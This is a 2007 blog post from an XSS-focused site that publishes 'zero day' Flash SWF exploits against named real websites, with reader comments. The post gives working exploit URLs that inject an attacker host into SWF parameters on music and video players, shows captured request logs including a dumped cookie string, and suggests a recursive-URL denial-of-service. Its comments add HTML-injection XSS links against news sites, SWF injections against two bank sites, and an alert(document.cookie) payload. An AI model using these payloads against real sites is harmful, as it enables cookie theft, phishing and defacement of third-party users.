XSS Worm : Cross Site Scripting & Web 2.0 Security

Application Vulnerability Information Portal

« Security Experts Warn of Web 2.0 Woes : XSS and AJAX Hacking Attacks
0day inject Exploit for Wordpress 2.3 - xssworm.com - all version vulnerable with no patch »

Zero Day Shockwave SWF Player Exploit with XSS Attack

Posted by xssworm on November 10th, 2007

Here we have some demonstration of proofs for XSS Scripting attacks and cross flash forgery on many sites.

Many hopes for our readers to leave some feedback on these serious vulnerabilities.

SWF Exploit 1.)

We make a hit with browser to target shockwave

http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true

but in a localhost is seen

Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

..

(-;

Maybe the Blackhat attack to deny server users : host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com

also browser says:

http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true

but in logger we are seeing:

Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

& in the hacking metacafe we discover Shockwave XSS 0day attack to use by blackhat to steal fish:

MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC

Demo:

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&

We see logs outputs in XSSWORM.com ::
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE000039DC|4726056DCE] s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D=[CS]v4|473350E200004A7E-A000C800004398|473350E2[C
E]; s_vi_zox7Ekigx7Ex7De=[CS]v|47009D8E00027B7-A000B0400000F80|400A7C4[CE];
s_vi_kefx7Dhxxkdn=[CS]v4|4707E570000074C7-A1606500003648|47200DA4DB[CE]; s_vi_jd
ghjfxxliyo=[CS]v4|4726056E0000760-A00070BAE000039DC|4726056[CE]; svi_nyhylx7B89
x3E=[CS]v4|46FEC0DF0004AB3-A00B28000180|46FEC0D[CE]; s_vi_hfedldmx0×7B=[CS
]v4|4725839500005A8F-A160B1700007C|472605EC[CE]; s_vi_x7Dx6067zbhx7Dl=[CS]v4|4
6FEC0C4000077C6-A160B2100003DDF|4EC4EC0C4[CE]; s_vi_ox7Dyhex700Ffnoxx=[C]v4|4FEC0
BC00003E04-A000B000075F|46C0BBCE]; s_vi_pogx7F4k=[CS]v7208C000DB-A
290B5A000015EB|47208C61[CE]; s_vi_igdx7Fxxiae=[CS]v4|47225ED8000044DD-A140A36000
02900|47225ED7[CE]; s_vi_brcxxaabctrxxatkppc=[CS]v4|4709002200006037-A290A9D0000
6E2E|4717A488[CE]; s_vi_kefx7Dhndfyx7B=[CS]v4|470EE04300002808-A140A2500000049|4
70EE043[CE]; s_vi_chsts003DBF|4734B658[CE]; s_vi_svx7Cywxxdsux7Edbuqe=[CS]v4|47351D–

snips…

We see many more serious vulnerability in the web 2.0 today.

Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true

In server log:

connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/

(;

Please leave nice XSS comments.

These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • blinkbits
  • BlinkList
  • blogmarks
  • BlogMemes
  • Book.mark.hu
  • Bumpzee
  • co.mments
  • connotea
  • De.lirio.us
  • DotNetKicks
  • DZone
  • Fark
  • feedmelinks
  • Fleck
  • Furl
  • Gwar
  • Haohao
  • Hemidemi
  • IndiaGram
  • IndianPad
  • Internetmedia
  • kick.ie
  • LinkaGoGo
  • Linkter
  • Ma.gnolia
  • MisterWong
  • MyShare
  • Netscape
  • Netvouz
  • NewsVine
  • PlugIM
  • PopCurrent
  • ppnow
  • RawSugar
  • Rec6
  • Reddit
  • scuttle
  • Shadows
  • Simpy
  • Slashdot
  • Smarking
  • SphereIt
  • Spurl
  • StumbleUpon
  • Taggly
  • TailRank
  • Technorati
  • ThisNext
  • Webride
  • Wists
  • YahooMyWeb

This entry was posted on Saturday, November 10th, 2007 at 1:27 am and is filed under 0day exploits, Cross Site Request Forging, Flash Video, Hacking Metacafe, Social Network Worms, Web 2.0 Worms. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response. Pinging is currently not allowed.

8 Responses to “Zero Day Shockwave SWF Player Exploit with XSS Attack”

  1. vaj Says:
    November 10th, 2007 at 2:38 am

    Also at Fox

    http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%3Ch1%3E%3Ca%20href=//xssworm.com%3EXSS%20Worm%20Web%202.0%20Security%20Portal%3C/a%3E%3Cbr%3E%3C/h1%3EWith%20new%200day%20Fox%20News%20XSS%20Hacking%20Video!

  2. Facebook virus Says:
    November 11th, 2007 at 11:45 am

    not so good at these swf :(

    https://banking.cc-bank.de/media/flash/fondspreisticker/fondspreisticker.swf?xmlsrc=http://xssworm.com

  3. Facebook virus Says:
    November 11th, 2007 at 12:00 pm

    also here as well banks :(

    http://www.charter-bank.com/paypass/images/demo_060126.swf?applicationxml=http://xssworm.com

  4. 0day XSS Says:
    November 19th, 2007 at 12:42 am

    More XSS on FOX:

    http://www.myfoxla.com/myfox/pages/Home/SearchResult?siteId=1003&pageId=1.1&searchLocation=site&qt=%22%3E%3Cbr%3E%3Cbr%3E%3Ch1%3E%3Ca%20href=%22//xssworm.com%22%3EXSS%20Security%20Information%3C/a%3E%3C/h1%3E%3Cbr%3Ehttp://XSSWORM.COM%3Cbr%3E%3Cspan

  5. Cgi Proxy Says:
    May 30th, 2008 at 6:50 pm

    I enjoyed reading the Zero Day Shockwave SWF Player Exploit with XSS Attack post, although I did not think it was entirely the best approach … there are alternatives which would provide more positive results ..

  6. John Doe Says:
    June 12th, 2008 at 6:20 am

    73ae50e958e1c496b92e802056b135ed

  7. Daniel Says:
    June 29th, 2008 at 8:11 pm

    I read similar article also named Zero Day Shockwave SWF Player Exploit with XSS Attack, and it was completely different. Personally, I agree with you more, because this article makes a little bit more sense for me

  8. asdf Says:
    June 29th, 2008 at 8:27 pm

    alert(document.cookie)

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

« Security Experts Warn of Web 2.0 Woes : XSS and AJAX Hacking Attacks
0day inject Exploit for Wordpress 2.3 - xssworm.com - all version vulnerable with no patch »